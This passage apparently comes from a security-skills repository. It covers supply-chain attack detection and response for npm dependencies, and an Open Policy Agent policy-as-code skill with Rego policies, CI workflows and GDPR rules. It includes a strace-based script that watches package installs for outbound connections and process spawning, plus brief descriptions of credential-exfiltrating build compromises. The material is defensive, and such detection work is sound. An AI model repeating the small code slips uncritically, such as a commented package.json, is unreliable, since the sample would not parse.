**MITRE ATT&CK**: T1195.003
**CWE**: CWE-494
**Attack Description**:
Compromising the build or release infrastructure to inject malicious code during the build process.
**Real-World Examples**:
- **SolarWinds (2020)**: Build system compromise led to trojanized software updates
- **Codecov (2021)**: Bash uploader script modified to exfiltrate credentials
**Attack Vectors**:
- Compromised CI/CD credentials
- Malicious CI/CD pipeline configurations
- Compromised build dependencies
- Registry credential theft during build
- Artifact repository compromise
**Detection**:
- Reproducible builds (verify build output matches)
- Build artifact signing and verification
- Supply chain levels for software artifacts (SLSA)
- Build provenance tracking
**Prevention**:
- Secure CI/CD infrastructure
- Minimal build environment (containers)
- Secret management (avoid env vars in logs)
- Build isolation and sandboxing
- SBOM generation at build time
## Detection Strategies
### Static Analysis Indicators
**Package Metadata Analysis**:
```python
# Black Duck provides these metrics
suspicious_indicators = {
"recent_creation": age_days < 30,
"low_adoption": downloads < 100,
"no_repository": github_url == None,
"new_maintainer": maintainer_age < 90,
"version_spike": version > expected + 50,
"abandoned": last_update_days > 730
}
```
### Behavioral Analysis
**Runtime Monitoring**:
- Network connections during install
- File system access outside package directory
- Process spawning (especially child processes)
- Environment variable access
- Encrypted/obfuscated payloads
**Example Detection Script**:
```bash
#!/bin/bash
# Monitor package installation for suspicious behavior
strace -f -e trace=network,process,file npm install suspicious-package 2>&1 | \
grep -E "(connect|sendto|execve|openat)" | \
grep -v "npmjs.org\|yarnpkg.com" # Exclude legitimate registries
# Any network activity to non-registry domains during install is suspicious
```
### Dependency Graph Analysis
**Transitive Dependency Risk**:
```
Your App
├── legitimate-package@1.0.0
│ └── utility-lib@2.0.0 (✓ Safe)
│ └── string-helper@1.0.0 (⚠️ Recently added)
│ └── unknown-package@99.0.0 (❌ SUSPICIOUS)
```
**Black Duck Features**:
- Full dependency tree visualization
- Transitive vulnerability detection
- Component risk scoring
- Supply chain risk assessment
## Prevention and Mitigation
### 1. Dependency Vetting Process
**Before Adding Dependency**:
```markdown
# Dependency Vetting Checklist
- [ ] Active maintenance (commits within 3 months)
- [ ] Sufficient adoption (downloads, GitHub stars)
- [ ] Code repository available and reviewed
- [ ] Recent security audit or assessment
- [ ] Compatible license
- [ ] Minimal transitive dependencies
- [ ] No known vulnerabilities (Black Duck scan)
- [ ] Maintainer reputation verified
- [ ] Reasonable package size
- [ ] Documentation quality adequate
```
**Automated Checks**:
```bash
#!/bin/bash
# Automated dependency vetting
PACKAGE=$1
# Check age and popularity
npm view $PACKAGE time.created downloads
# Check for known vulnerabilities
npm audit
# Black Duck scan
scripts/blackduck_scan.py --project temp-vet --version 1.0.0
# Check for typosquatting
python3 -c "
import Levenshtein
from package_registry import get_popular_packages
popular = get_popular_packages()
for pkg in popular:
distance = Levenshtein.distance('$PACKAGE', pkg)
if distance <= 2:
print(f'⚠️ Similar to {pkg} (distance: {distance})')
"
```
### 2. Dependency Pinning and Lock Files
**Always use lock files**:
```json
// package.json - use exact versions for security-critical deps
{
"dependencies": {
"critical-auth-lib": "1.2.3", // Exact version
"utility-lib": "^2.0.0" // Allow minor updates
}
}
```
**Commit lock files**:
- package-lock.json (npm)
- yarn.lock (Yarn)
- Pipfile.lock (Python)
- Gemfile.lock (Ruby)
- go.sum (Go)
### 3. Subresource Integrity (SRI)
**For CDN-loaded dependencies**:
```html
<!-- Use SRI hashes for external scripts -->
<script
src="https://cdn.example.com/library.js"
integrity="sha384-oqVuAfXRKap7fdgcCY5uykM6+R9GqQ8K/ux..."
crossorigin="anonymous">
</script>
```
### 4. Private Package Registry
**Benefits**:
- Control over approved packages
- Caching for availability
- Internal package distribution
- Security scanning integration
**Solutions**:
- Artifactory (JFrog)
- Nexus Repository
- Azure Artifacts
- AWS CodeArtifact
- GitHub Packages
**Configuration Example (npm)**:
```bash
# .npmrc
registry=https://artifactory.company.com/api/npm/npm-virtual/
@company:registry=https://artifactory.company.com/api/npm/npm-internal/
# Always authenticate
always-auth=true
```
### 5. Continuous Monitoring
**Automated Scanning**:
```yaml
# .github/workflows/dependency-scan.yml
name: Dependency Security Scan
on:
schedule:
- cron: '0 0 * * *' # Daily
pull_request:
push:
branches: [main]
jobs:
scan:
runs-on: ubuntu-latest
steps:
- uses: actions/checkout@v3
- name: Black Duck Scan
run: |
scripts/blackduck_scan.py \
--project ${{ github.repository }} \
--version ${{ github.sha }} \
--fail-on-policy
- name: Check for new dependencies
run: |
git diff origin/main -- package.json | \
grep "^+" | grep -v "^+++" | \
while read line; do
echo "⚠️ New dependency requires review: $line"
done
```
### 6. Runtime Protection
**Application-level**:
```javascript
// Freeze object prototypes to prevent pollution
Object.freeze(Object.prototype);
Object.freeze(Array.prototype);
// Restrict network access for dependencies (if possible)
// Use Content Security Policy (CSP) for web apps
// Monitor unexpected behavior
process.on('warning', (warning) => {
if (warning.name === 'DeprecationWarning') {
// Log and alert on deprecated API usage
securityLog.warn('Deprecated API used', { warning });
}
});
```
**Container-level**:
```dockerfile
# Use minimal base images
FROM node:18-alpine
# Run as non-root
USER node
# Read-only file system where possible
VOLUME /app
WORKDIR /app
# No network access during build
RUN --network=none npm ci
```
## Incident Response
### Detection Phase
**Indicators of Compromise**:
1. Black Duck alerts on component changes
2. Unexpected network traffic from application
3. CPU/memory spikes (cryptocurrency mining)
4. Security tool alerts
5. Credential compromise reports
6. Customer reports of suspicious behavior
### Containment
**Immediate Actions**:
1. **Isolate**: Remove affected application from network
2. **Inventory**: Identify all systems using compromised dependency
3. **Block**: Add malicious package to blocklist
4. **Rotate**: Rotate all credentials that may have been exposed
```bash
# Emergency response script
#!/bin/bash
MALICIOUS_PACKAGE=$1
# 1. Block package in registry
curl -X POST https://artifactory/api/blocklist \
-d "{\"package\": \"$MALICIOUS_PACKAGE\"}"
# 2. Find all projects using it
find /repos -name package.json -exec \
grep -l "$MALICIOUS_PACKAGE" {} \;
# 3. Emergency notification
send_alert "CRITICAL: Supply chain compromise detected - $MALICIOUS_PACKAGE"
# 4. Rotate secrets
./rotate_all_credentials.sh
# 5. Re-scan all projects
for project in $(get_all_projects); do
scripts/blackduck_scan.py --project $project --emergency-scan
done
```
### Eradication
1. **Remove** malicious dependency
2. **Replace** with safe alternative or version
3. **Re-scan** with Black Duck to confirm
4. **Review** logs for malicious activity
5. **Rebuild** from clean state
### Recovery
1. **Deploy** patched version
2. **Monitor** for continued malicious activity
3. **Verify** integrity of application
4. **Restore** from backup if necessary
### Post-Incident
**Root Cause Analysis**:
- How did malicious package enter supply chain?
- What controls failed?
- What was the impact?
**Improvements**:
- Update vetting procedures
- Enhance monitoring
- Additional training
- Technical controls
## Tools and Resources
**Detection Tools**:
- **Synopsys Black Duck**: Comprehensive SCA with supply chain risk
- **Socket.dev**: Real-time supply chain attack detection
- **Snyk**: Vulnerability and license scanning
- **Checkmarx SCA**: Software composition analysis
**Best Practices**:
- [CISA Supply Chain Guidance](https://www.cisa.gov/supply-chain)
- [NIST SSDF](https://csrc.nist.gov/publications/detail/sp/800-218/final)
- [SLSA Framework](https://slsa.dev/)
- [OWASP Dependency Check](https://owasp.org/www-project-dependency-check/)
**Incident Databases**:
- [Supply Chain Compromises](https://github.com/IQTLabs/software-supply-chain-compromises)
- [Backstabber's Knife Collection](https://dasfreak.github.io/Backstabbers-Knife-Collection/)
## References
- [Sonatype 2022 State of Software Supply Chain](https://www.sonatype.com/state-of-the-software-supply-chain)
- [MITRE ATT&CK - Supply Chain Compromise](https://attack.mitre.org/techniques/T1195/)
- [NIST SSDF](https://csrc.nist.gov/publications/detail/sp/800-218/final)
- [Linux Foundation - Securing the Software Supply Chain](https://www.linuxfoundation.org/resources/publications/securing-the-software-supply-chain)

View File

@@ -0,0 +1,5 @@
# Compliance & Auditing Skills
This directory contains skills for security compliance and auditing operations.
See the main [README.md](../../README.md) for usage and [CONTRIBUTE.md](../../CONTRIBUTE.md) for contribution guidelines.

View File

@@ -0,0 +1,431 @@
---
name: policy-opa
description: >
Policy-as-code enforcement and compliance validation using Open Policy Agent (OPA).
Use when: (1) Enforcing security and compliance policies across infrastructure and applications,
(2) Validating Kubernetes admission control policies, (3) Implementing policy-as-code for
compliance frameworks (SOC2, PCI-DSS, GDPR, HIPAA), (4) Testing and evaluating OPA Rego policies,
(5) Integrating policy checks into CI/CD pipelines, (6) Auditing configuration drift against
organizational security standards, (7) Implementing least-privilege access controls.
version: 0.1.0
maintainer: SirAppSec
category: compliance
tags: [opa, policy-as-code, compliance, rego, kubernetes, admission-control, soc2, gdpr, pci-dss, hipaa]
frameworks: [SOC2, PCI-DSS, GDPR, HIPAA, NIST, ISO27001]
dependencies:
tools: [opa, docker, kubectl]
packages: [jq, yq]
references:
- https://www.openpolicyagent.org/docs/latest/
- https://www.openpolicyagent.org/docs/latest/policy-language/
- https://www.conftest.dev/
---
# Policy-as-Code with Open Policy Agent
## Overview
This skill enables policy-as-code enforcement using Open Policy Agent (OPA) for compliance validation, security policy enforcement, and configuration auditing. OPA provides a unified framework for policy evaluation across cloud-native environments, Kubernetes, CI/CD pipelines, and infrastructure-as-code.
Use OPA to codify security requirements, compliance controls, and organizational standards as executable policies written in Rego. Automatically validate configurations, prevent misconfigurations, and maintain continuous compliance.
## Quick Start
### Install OPA
```bash
# macOS
brew install opa
# Linux
curl -L -o opa https://openpolicyagent.org/downloads/latest/opa_linux_amd64
chmod +x opa
# Verify installation
opa version
```
### Basic Policy Evaluation
```bash
# Evaluate a policy against input data
opa eval --data policy.rego --input input.json 'data.example.allow'
# Test policies with unit tests
opa test policy.rego policy_test.rego --verbose
# Run OPA server for live policy evaluation
opa run --server --addr localhost:8181
```
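Once the server is running, policies can be queried over OPA's Data API; a minimal sketch using only the Python standard library, with the `example.allow` path matching the eval examples above (the input document is illustrative):
```python
import json
import urllib.request

# POST input to the Data API; OPA evaluates data.example.allow against it
payload = json.dumps({"input": {"user": "alice", "method": "GET"}}).encode()
req = urllib.request.Request(
    "http://localhost:8181/v1/data/example/allow",
    data=payload,
    headers={"Content-Type": "application/json"},
)
with urllib.request.urlopen(req) as resp:
    result = json.load(resp)

print(result.get("result"))  # True/False, or None if the rule is undefined
```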
## Core Workflow
### Step 1: Define Policy Requirements
Identify compliance requirements and security controls to enforce:
- Compliance frameworks (SOC2, PCI-DSS, GDPR, HIPAA, NIST)
- Kubernetes security policies (pod security, RBAC, network policies)
- Infrastructure-as-code policies (Terraform, CloudFormation)
- Application security policies (API authorization, data access)
- Organizational security standards
### Step 2: Write OPA Rego Policies
Create policy files in Rego language. Use the provided templates in `assets/` for common patterns:
**Example: Kubernetes Pod Security Policy**
```rego
package kubernetes.admission
import future.keywords.contains
import future.keywords.if
deny[msg] {
input.request.kind.kind == "Pod"
container := input.request.object.spec.containers[_]
container.securityContext.privileged == true
msg := sprintf("Privileged containers are not allowed: %v", [container.name])
}
deny[msg] {
input.request.kind.kind == "Pod"
container := input.request.object.spec.containers[_]
not container.securityContext.runAsNonRoot
msg := sprintf("Container must run as non-root: %v", [container.name])
}
```
**Example: Compliance Control Validation (SOC2)**
```rego
package compliance.soc2
import future.keywords.if
# CC6.1: Logical and physical access controls
deny[msg] {
input.kind == "Deployment"
not input.spec.template.metadata.labels["data-classification"]
msg := "SOC2 CC6.1: All deployments must have data-classification label"
}
# CC6.6: Encryption in transit
deny[msg] {
input.kind == "Service"
input.spec.type == "LoadBalancer"
not input.metadata.annotations["service.beta.kubernetes.io/aws-load-balancer-ssl-cert"]
msg := "SOC2 CC6.6: LoadBalancer services must use SSL/TLS encryption"
}
```
### Step 3: Test Policies with Unit Tests
Write comprehensive tests for policy validation:
```rego
package kubernetes.admission_test

import data.kubernetes.admission

test_deny_privileged_container {
    test_input := {
        "request": {
            "kind": {"kind": "Pod"},
            "object": {
                "spec": {
                    "containers": [{
                        "name": "nginx",
                        "securityContext": {"privileged": true}
                    }]
                }
            }
        }
    }
    count(admission.deny) > 0 with input as test_input
}

test_allow_unprivileged_container {
    test_input := {
        "request": {
            "kind": {"kind": "Pod"},
            "object": {
                "spec": {
                    "containers": [{
                        "name": "nginx",
                        "securityContext": {"privileged": false, "runAsNonRoot": true}
                    }]
                }
            }
        }
    }
    count(admission.deny) == 0 with input as test_input
}
```
Run tests:
```bash
opa test . --verbose
```
### Step 4: Evaluate Policies Against Configuration
Use the bundled evaluation script for policy validation:
```bash
# Evaluate single file
./scripts/evaluate_policy.py --policy policies/ --input config.yaml
# Evaluate directory of configurations
./scripts/evaluate_policy.py --policy policies/ --input configs/ --recursive
# Output results in JSON format for CI/CD integration
./scripts/evaluate_policy.py --policy policies/ --input config.yaml --format json
```
Or use OPA directly:
```bash
# Evaluate with formatted output
opa eval --data policies/ --input config.yaml --format pretty 'data.compliance.violations'
# Bundle evaluation for complex policies
opa eval --bundle policies.tar.gz --input config.yaml 'data'
```
### Step 5: Integrate with CI/CD Pipelines
Add policy validation to your CI/CD workflow:
**GitHub Actions Example:**
```yaml
- name: Validate Policies
uses: open-policy-agent/setup-opa@v2
with:
version: latest
- name: Run Policy Tests
run: opa test policies/ --verbose
- name: Evaluate Configuration
run: |
opa eval --data policies/ --input deployments/ \
  --format json 'data.compliance.violations' > violations.json
if [ "$(jq '.result[0].expressions[0].value | length' violations.json)" -gt 0 ]; then
echo "Policy violations detected!"
cat violations.json
exit 1
fi
```
**GitLab CI Example:**
```yaml
policy-validation:
image: openpolicyagent/opa:latest
script:
- opa test policies/ --verbose
- opa eval --data policies/ --input configs/ --format pretty 'data.compliance.violations'
artifacts:
reports:
junit: test-results.xml
```
### Step 6: Deploy as Kubernetes Admission Controller
Enforce policies at cluster level using OPA Gatekeeper:
```bash
# Install OPA Gatekeeper
kubectl apply -f https://raw.githubusercontent.com/open-policy-agent/gatekeeper/master/deploy/gatekeeper.yaml
# Apply constraint template
kubectl apply -f assets/k8s-constraint-template.yaml
# Apply constraint
kubectl apply -f assets/k8s-constraint.yaml
# Test admission control
kubectl apply -f test-pod.yaml # Should be denied if violates policy
```
### Step 7: Monitor Policy Compliance
Generate compliance reports using the bundled reporting script:
```bash
# Generate compliance report
./scripts/generate_report.py --policy policies/ --audit-logs audit.json --output compliance-report.html
# Export violations for SIEM integration
./scripts/generate_report.py --policy policies/ --audit-logs audit.json --format json --output violations.json
```
## Security Considerations
- **Policy Versioning**: Store policies in version control with change tracking and approval workflows
- **Least Privilege**: Grant minimal permissions for policy evaluation - OPA should run with read-only access to configurations
- **Sensitive Data**: Avoid embedding secrets in policies - use external data sources or encrypted configs
- **Audit Logging**: Log all policy evaluations, violations, and exceptions for compliance auditing
- **Policy Testing**: Maintain comprehensive test coverage (>80%) for all policy rules
- **Separation of Duties**: Separate policy authors from policy enforcers; require peer review for policy changes
- **Compliance Mapping**: Map policies to specific compliance controls (SOC2 CC6.1, PCI-DSS 8.2.1) for audit traceability
## Bundled Resources
### Scripts (`scripts/`)
- `evaluate_policy.py` - Evaluate OPA policies against configuration files with formatted output
- `generate_report.py` - Generate compliance reports from policy evaluation results
- `test_policies.sh` - Run OPA policy unit tests with coverage reporting
### References (`references/`)
- `rego-patterns.md` - Common Rego patterns for security and compliance policies
- `compliance-frameworks.md` - Policy templates mapped to SOC2, PCI-DSS, GDPR, HIPAA controls
- `kubernetes-security.md` - Kubernetes security policies and admission control patterns
- `iac-policies.md` - Infrastructure-as-code policy validation for Terraform, CloudFormation
### Assets (`assets/`)
- `k8s-pod-security.rego` - Kubernetes pod security policy template
- `k8s-constraint-template.yaml` - OPA Gatekeeper constraint template
- `k8s-constraint.yaml` - Example Gatekeeper constraint configuration
- `soc2-compliance.rego` - SOC2 compliance controls as OPA policies
- `pci-dss-compliance.rego` - PCI-DSS requirements as OPA policies
- `gdpr-compliance.rego` - GDPR data protection policies
- `terraform-security.rego` - Terraform security best practices policies
- `ci-cd-pipeline.yaml` - CI/CD integration examples (GitHub Actions, GitLab CI)
## Common Patterns
### Pattern 1: Kubernetes Admission Control
Enforce security policies at pod creation time:
```rego
package kubernetes.admission
deny[msg] {
input.request.kind.kind == "Pod"
not input.request.object.spec.securityContext.runAsNonRoot
msg := "Pods must run as non-root user"
}
```
### Pattern 2: Infrastructure-as-Code Validation
Validate Terraform configurations before apply:
```rego
package terraform.security
deny[msg] {
resource := input.resource_changes[_]
resource.type == "aws_s3_bucket"
not resource.change.after.server_side_encryption_configuration
msg := sprintf("S3 bucket %v must have encryption enabled", [resource.name])
}
```
### Pattern 3: Compliance Framework Mapping
Map policies to specific compliance controls:
```rego
package compliance.soc2
# SOC2 CC6.1: Logical and physical access controls
cc6_1_violations[msg] {
input.kind == "RoleBinding"
input.roleRef.name == "cluster-admin"
msg := sprintf("SOC2 CC6.1 VIOLATION: cluster-admin binding for %v", [input.metadata.name])
}
```
### Pattern 4: Data Classification Enforcement
Enforce data handling policies based on classification:
```rego
package classification
deny[msg] {
input.metadata.labels["data-classification"] == "restricted"
input.spec.template.spec.volumes[_].hostPath
msg := "Restricted data cannot use hostPath volumes"
}
```
### Pattern 5: API Authorization Policies
Implement attribute-based access control (ABAC):
```rego
package api.authz
import future.keywords.if
allow if {
input.method == "GET"
input.path[0] == "public"
}
allow if {
input.method == "GET"
input.user.role == "admin"
}
allow if {
input.method == "POST"
input.user.role == "editor"
input.resource.owner == input.user.id
}
```
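A quick way to exercise this policy locally, assuming it is saved as `authz.rego` (the sample input below is illustrative):
```bash
cat > input.json <<'EOF'
{
  "method": "POST",
  "path": ["articles"],
  "user": {"id": "u42", "role": "editor"},
  "resource": {"owner": "u42"}
}
EOF

# Should print: true
opa eval --data authz.rego --input input.json --format pretty 'data.api.authz.allow'
```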
## Integration Points
- **CI/CD Pipelines**: GitHub Actions, GitLab CI, Jenkins, CircleCI - validate policies before deployment
- **Kubernetes**: OPA Gatekeeper admission controller for runtime policy enforcement (see the rollout sketch after this list)
- **Terraform/IaC**: Pre-deployment validation using `conftest` or OPA CLI
- **API Gateways**: Kong, Envoy, NGINX - authorize requests using OPA policies
- **Monitoring/SIEM**: Export policy violations to Splunk, ELK, Datadog for security monitoring
- **Compliance Tools**: Integrate with compliance platforms for control validation and audit trails
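For the Gatekeeper integration, a minimal rollout of the bundled pod-security template could look like the sketch below (assumes Gatekeeper is already installed in the cluster and the asset paths are used unchanged):
```bash
kubectl apply -f assets/k8s-constraint-template.yaml
kubectl apply -f assets/k8s-constraint.yaml

# Confirm the template registered and review violations reported by audit
kubectl get constrainttemplates
kubectl get constraints
kubectl describe k8spodsecurity pod-security-policy
```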
## Troubleshooting
### Issue: Policy Evaluation Returns Unexpected Results
**Solution**:
- Enable trace mode: `opa eval --data policy.rego --input input.json --explain full 'data.example.allow'`
- Validate input data structure matches policy expectations
- Check for typos in policy rules or variable names
- Run `opa check` to catch syntax and compilation errors, and `opa fmt` to normalize formatting
### Issue: Kubernetes Admission Control Not Blocking Violations
**Solution**:
- Verify Gatekeeper is running: `kubectl get pods -n gatekeeper-system`
- Check constraint status: `kubectl get constraints`
- Review audit logs: `kubectl logs -n gatekeeper-system -l control-plane=controller-manager`
- Ensure the ConstraintTemplate is installed and that the constraint's `match` criteria actually select the target kinds and namespaces
### Issue: Policy Tests Failing
**Solution**:
- Run tests with verbose output: `opa test . --verbose`
- Check test input data matches expected format
- Verify policy package names match between policy and test files
- Use `print()` statements in Rego for debugging
### Issue: Performance Degradation with Large Policy Sets
**Solution**:
- Use policy bundles: `opa build policies/ -o bundle.tar.gz` (see the sketch after this list)
- Enable partial evaluation for complex policies
- Optimize policy rules to reduce computational complexity
- Write rules with direct equality checks on input fields so OPA's rule indexing can skip non-matching rules
- Consider splitting large policy sets into separate evaluation domains
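A minimal bundle workflow for the first point above (paths are illustrative):
```bash
opa build policies/ -o bundle.tar.gz
opa eval --bundle bundle.tar.gz --input input.json 'data.kubernetes.admission.deny'
```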
## References
- [OPA Documentation](https://www.openpolicyagent.org/docs/latest/)
- [Rego Language Reference](https://www.openpolicyagent.org/docs/latest/policy-language/)
- [OPA Gatekeeper](https://open-policy-agent.github.io/gatekeeper/website/)
- [Conftest](https://www.conftest.dev/)
- [OPA Kubernetes Tutorial](https://www.openpolicyagent.org/docs/latest/kubernetes-tutorial/)
- [SOC2 Security Controls](https://www.aicpa.org/interestareas/frc/assuranceadvisoryservices/aicpasoc2report.html)
- [PCI-DSS Requirements](https://www.pcisecuritystandards.org/)
- [GDPR Compliance Guide](https://gdpr.eu/)

View File

@@ -0,0 +1,9 @@
# Assets Directory
Place files that will be used in the output Claude produces:
- Templates
- Configuration files
- Images/logos
- Boilerplate code
These files are NOT loaded into context but copied/modified in output.

View File

@@ -0,0 +1,234 @@
# GitHub Actions CI/CD Pipeline with OPA Policy Validation
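# Assumes the layout used elsewhere in this skill: Rego policies under policies/,
# Kubernetes manifests under k8s/, and scripts/generate_report.py for reporting.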
name: OPA Policy Validation
on:
push:
branches: [ main, develop ]
pull_request:
branches: [ main ]
jobs:
# Test OPA policies with unit tests
test-policies:
name: Test OPA Policies
runs-on: ubuntu-latest
steps:
- name: Checkout code
uses: actions/checkout@v3
- name: Setup OPA
uses: open-policy-agent/setup-opa@v2
with:
version: latest
- name: Run Policy Tests
run: |
opa test policies/ --verbose --coverage
opa test policies/ --coverage --format=json > coverage.json
- name: Check Coverage Threshold
run: |
COVERAGE=$(jq -r '.coverage' coverage.json | awk '{print int($1)}')
if [ "$COVERAGE" -lt 80 ]; then
echo "Coverage $COVERAGE% is below threshold 80%"
exit 1
fi
echo "Coverage: $COVERAGE%"
# Validate Kubernetes manifests
validate-kubernetes:
name: Validate Kubernetes Configs
runs-on: ubuntu-latest
needs: test-policies
steps:
- name: Checkout code
uses: actions/checkout@v3
- name: Setup OPA
uses: open-policy-agent/setup-opa@v2
- name: Validate Kubernetes Manifests
run: |
shopt -s globstar nullglob
for file in k8s/**/*.yaml; do
echo "Validating $file"
opa eval --data policies/ --input "$file" \
--format json 'data.kubernetes.admission.deny' \
| jq '.result[0].expressions[0].value' > violations.json
if [ "$(jq 'length' violations.json)" -gt 0 ]; then
echo "Policy violations found in $file:"
cat violations.json
exit 1
fi
done
- name: Generate Validation Report
if: always()
run: |
./scripts/generate_report.py \
--policy policies/ \
--audit-logs violations.json \
--format html \
--output validation-report.html
- name: Upload Report
if: always()
uses: actions/upload-artifact@v3
with:
name: validation-report
path: validation-report.html
# Validate Terraform configurations
validate-terraform:
name: Validate Terraform Configs
runs-on: ubuntu-latest
needs: test-policies
steps:
- name: Checkout code
uses: actions/checkout@v3
- name: Setup Terraform
uses: hashicorp/setup-terraform@v2
- name: Setup OPA
uses: open-policy-agent/setup-opa@v2
- name: Terraform Init
run: terraform init
- name: Generate Terraform Plan
run: |
terraform plan -out=tfplan.binary
terraform show -json tfplan.binary > tfplan.json
- name: Validate with OPA
run: |
opa eval --data policies/terraform/ --input tfplan.json \
--format json 'data.terraform.security.deny' \
| jq '.result[0].expressions[0].value' > terraform-violations.json
if [ "$(jq 'length' terraform-violations.json)" -gt 0 ]; then
echo "Terraform policy violations detected:"
cat terraform-violations.json
exit 1
fi
# Compliance validation for production
compliance-check:
name: Compliance Validation
runs-on: ubuntu-latest
if: github.ref == 'refs/heads/main'
needs: [validate-kubernetes, validate-terraform]
steps:
- name: Checkout code
uses: actions/checkout@v3
- name: Setup OPA
uses: open-policy-agent/setup-opa@v2
- name: SOC2 Compliance Check
run: |
opa eval --data policies/compliance/soc2-compliance.rego \
--input deployments/ \
--format json 'data.compliance.soc2.deny' \
> soc2-violations.json
- name: PCI-DSS Compliance Check
run: |
opa eval --data policies/compliance/pci-dss-compliance.rego \
--input deployments/ \
--format json 'data.compliance.pci.deny' \
> pci-violations.json
- name: GDPR Compliance Check
run: |
opa eval --data policies/compliance/gdpr-compliance.rego \
--input deployments/ \
--format json 'data.compliance.gdpr.deny' \
> gdpr-violations.json
- name: Generate Compliance Report
run: |
./scripts/generate_report.py \
--policy policies/compliance/ \
--audit-logs soc2-violations.json \
--format html \
--output compliance-report.html
- name: Upload Compliance Report
uses: actions/upload-artifact@v3
with:
name: compliance-report
path: compliance-report.html
- name: Fail on Violations
run: |
TOTAL_VIOLATIONS=$(cat *-violations.json | jq -s 'map(.result[0].expressions[0].value | length) | add')
if [ "$TOTAL_VIOLATIONS" -gt 0 ]; then
echo "Found $TOTAL_VIOLATIONS compliance violations"
exit 1
fi
---
# GitLab CI/CD Pipeline Example
# .gitlab-ci.yml
stages:
- test
- validate
- compliance
variables:
OPA_VERSION: "latest"
test-policies:
stage: test
image: openpolicyagent/opa:${OPA_VERSION}
script:
- opa test policies/ --verbose --coverage
- opa test policies/ --format=json --coverage > coverage.json
artifacts:
reports:
coverage_report:
coverage_format: cobertura
path: coverage.json
validate-kubernetes:
stage: validate
image: openpolicyagent/opa:${OPA_VERSION}
script:
- |
for file in k8s/**/*.yaml; do
opa eval --data policies/ --input "$file" \
'data.kubernetes.admission.deny' || exit 1
done
only:
- merge_requests
- main
validate-terraform:
stage: validate
image: hashicorp/terraform:latest
before_script:
- apk add --no-cache curl jq
- curl -L -o /usr/local/bin/opa https://openpolicyagent.org/downloads/latest/opa_linux_amd64
- chmod +x /usr/local/bin/opa
script:
- terraform init
- terraform plan -out=tfplan.binary
- terraform show -json tfplan.binary > tfplan.json
- opa eval --data policies/terraform/ --input tfplan.json 'data.terraform.security.deny'
only:
- merge_requests
- main
compliance-check:
stage: compliance
image: openpolicyagent/opa:${OPA_VERSION}
script:
- opa eval --data policies/compliance/ --input deployments/ 'data.compliance'
artifacts:
reports:
junit: compliance-report.xml
only:
- main

View File

@@ -0,0 +1,159 @@
package compliance.gdpr
import future.keywords.if
# GDPR Article 25: Data Protection by Design and by Default
# Require data classification labels
deny[msg] {
input.kind == "Deployment"
processes_personal_data(input)
not input.metadata.labels["data-classification"]
msg := {
"control": "GDPR Article 25",
"severity": "high",
"violation": sprintf("Deployment processing personal data requires classification: %v", [input.metadata.name]),
"remediation": "Add label: data-classification=personal|sensitive|public",
}
}
# Data minimization - limit replicas for personal data
deny[msg] {
input.kind == "Deployment"
input.metadata.labels["data-type"] == "personal"
input.spec.replicas > 3
not input.metadata.annotations["gdpr.justification"]
msg := {
"control": "GDPR Article 25",
"severity": "medium",
"violation": sprintf("Excessive replicas for personal data: %v", [input.metadata.name]),
"remediation": "Reduce replicas or add justification annotation",
}
}
# Require purpose limitation annotation
deny[msg] {
input.kind == "Deployment"
processes_personal_data(input)
not input.metadata.annotations["data-purpose"]
msg := {
"control": "GDPR Article 25",
"severity": "medium",
"violation": sprintf("Personal data deployment requires purpose annotation: %v", [input.metadata.name]),
"remediation": "Add annotation: data-purpose=<specific purpose>",
}
}
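# The multiple definitions of processes_personal_data below act as a logical OR:
# a resource is treated as processing personal data if any one body succeeds.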
processes_personal_data(resource) {
resource.metadata.labels["data-type"] == "personal"
}
processes_personal_data(resource) {
resource.metadata.labels["data-type"] == "pii"
}
processes_personal_data(resource) {
contains(lower(resource.metadata.name), "user")
}
# GDPR Article 32: Security of Processing
# Require encryption for personal data volumes
deny[msg] {
input.kind == "PersistentVolumeClaim"
input.metadata.labels["data-type"] == "personal"
not input.metadata.annotations["volume.encryption.enabled"] == "true"
msg := {
"control": "GDPR Article 32",
"severity": "high",
"violation": sprintf("Personal data volume requires encryption: %v", [input.metadata.name]),
"remediation": "Enable volume encryption",
}
}
# Require TLS for personal data services
deny[msg] {
input.kind == "Service"
input.metadata.labels["data-type"] == "personal"
not input.metadata.annotations["tls.enabled"] == "true"
msg := {
"control": "GDPR Article 32",
"severity": "high",
"violation": sprintf("Personal data service requires TLS: %v", [input.metadata.name]),
"remediation": "Enable TLS encryption",
}
}
# Require pseudonymization or anonymization
deny[msg] {
input.kind == "Deployment"
processes_personal_data(input)
not input.metadata.annotations["data-protection.method"]
msg := {
"control": "GDPR Article 32",
"severity": "medium",
"violation": sprintf("Personal data deployment requires protection method: %v", [input.metadata.name]),
"remediation": "Add annotation: data-protection.method=pseudonymization|anonymization|encryption",
}
}
# GDPR Article 33: Breach Notification
# Require incident response plan
deny[msg] {
input.kind == "Deployment"
processes_personal_data(input)
input.metadata.namespace == "production"
not input.metadata.annotations["incident-response.plan"]
msg := {
"control": "GDPR Article 33",
"severity": "medium",
"violation": sprintf("Production personal data deployment requires incident response plan: %v", [input.metadata.name]),
"remediation": "Add annotation: incident-response.plan=<plan-id>",
}
}
# GDPR Article 30: Records of Processing Activities
# Require data processing record
deny[msg] {
input.kind == "Deployment"
processes_personal_data(input)
not input.metadata.annotations["dpa.record-id"]
msg := {
"control": "GDPR Article 30",
"severity": "medium",
"violation": sprintf("Personal data deployment requires processing record: %v", [input.metadata.name]),
"remediation": "Add annotation: dpa.record-id=<record-id>",
}
}
# GDPR Article 35: Data Protection Impact Assessment (DPIA)
# Require DPIA for high-risk processing
deny[msg] {
input.kind == "Deployment"
input.metadata.labels["data-type"] == "sensitive"
not input.metadata.annotations["dpia.reference"]
msg := {
"control": "GDPR Article 35",
"severity": "high",
"violation": sprintf("Sensitive data deployment requires DPIA: %v", [input.metadata.name]),
"remediation": "Conduct DPIA and add annotation: dpia.reference=<dpia-id>",
}
}
# GDPR Article 17: Right to Erasure (Right to be Forgotten)
# Require data retention policy
deny[msg] {
input.kind == "PersistentVolumeClaim"
input.metadata.labels["data-type"] == "personal"
not input.metadata.annotations["data-retention.days"]
msg := {
"control": "GDPR Article 17",
"severity": "medium",
"violation": sprintf("Personal data volume requires retention policy: %v", [input.metadata.name]),
"remediation": "Add annotation: data-retention.days=<number>",
}
}

View File

@@ -0,0 +1,87 @@
apiVersion: templates.gatekeeper.sh/v1beta1
kind: ConstraintTemplate
metadata:
name: k8spodsecurity
annotations:
description: "Enforces pod security standards including privileged containers, host namespaces, and capabilities"
spec:
crd:
spec:
names:
kind: K8sPodSecurity
validation:
openAPIV3Schema:
type: object
properties:
allowPrivileged:
type: boolean
description: "Allow privileged containers"
